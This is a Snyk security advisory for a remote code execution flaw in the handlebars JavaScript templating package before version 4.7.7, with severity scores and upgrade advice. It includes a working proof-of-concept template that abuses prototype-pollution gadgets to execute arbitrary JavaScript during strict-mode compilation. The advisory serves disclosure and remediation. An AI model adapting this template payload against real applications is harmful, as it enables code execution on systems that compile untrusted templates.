Remote Code Execution (RCE) Affecting handlebars package, versions <4.7.7


0.0
high

Snyk CVSS

    Attack Complexity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 8.43% (95th percentile)
Expand this section
NVD
9.8 critical
Expand this section
Red Hat
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-HANDLEBARS-1056767
  • published 15 Feb 2021
  • disclosed 8 Jan 2021
  • credit Francois Lajeunesse-Robert

How to fix?

Upgrade handlebars to version 4.7.7 or higher.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.

POC

<script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script> 
<script> 
// compile the template 
var s = ` 
{{#with (__lookupGetter__ "__proto__")}} 
{{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} 
{{#with ../constructor.prototype}} 
{{../../constructor.defineProperty . "hasOwnProperty" ..}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{#with "constructor"}} 
{{#with split}} 
{{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}} 
{{#with .}} 
{{#with (concat (lookup join (slice 0 1)))}} 
{{#each (slice 2 3)}} 
{{#with (apply 0 ../..)}} 
{{.}} 
{{/with}} 
{{/each}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{/with}} 
`;
var template = Handlebars.compile(s, { 
strict: true 
}); 
// execute the compiled template and print the output to the console console.log(template({})); 
</script>

References